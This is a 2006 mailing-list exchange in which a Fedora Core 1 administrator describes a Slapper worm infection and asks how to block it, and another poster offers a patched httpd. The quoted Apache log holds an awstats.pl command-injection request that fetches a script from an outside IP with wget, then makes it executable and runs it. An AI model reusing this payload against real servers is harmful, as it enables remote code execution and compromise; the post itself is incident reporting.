slapper worm
James Kosin
jkosin at beta.intcomgrp.com
Mon Jan 23 20:42:22 UTC 2006
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Michael Mansour wrote:
> Hi guys,
>
> I have an FC1 machine which got infected twice with the slapper worm, and then
> started DOS attacking a large vendor.
>
> I've stopped slapper in its tracks with a couple of changes to FC1, but in
> analysing now how it got in (it seems to use SSLv2 vulerabilities in an apache
> SSL server which I've now turned off), I see the following bit of interest in
> my apache access_log:
>
> 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET
> /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
> HTTP/1.1"
> 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
> /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
> HTTP/1.1"
> 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
>
> These "scripz" files end up going into /tmp, being compiled with gcc, renamed
> to "httpd" and run as that.
>
> I'm using:
>
> perl-5.8.3-17.4.legacy
> httpd-2.0.51-1.9.legacy
> openssl-0.9.7a-33.13.legacy
>
> Are there any updates FL can do to any of the packages to fix/block slapper
> from an FC1 machine?
>
> Michael.
>
Michael,
Try my version of httpd here:
http://support.intcomgrp.com/~jkosin
It has been effective against the worm so far.
James Kosin
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFD1T+ukNLDmnu1kSkRAv20AJ0d7pl7B6zAOZb+OmhkiiKG/Fpp1ACfcnmE
gJoc286M9LvSAXn2cjXHEok=
=5ZOF
-----END PGP SIGNATURE-----
--
Scanned by ClamAV - http://www.clamav.net
More information about the fedora-legacy-list
mailing list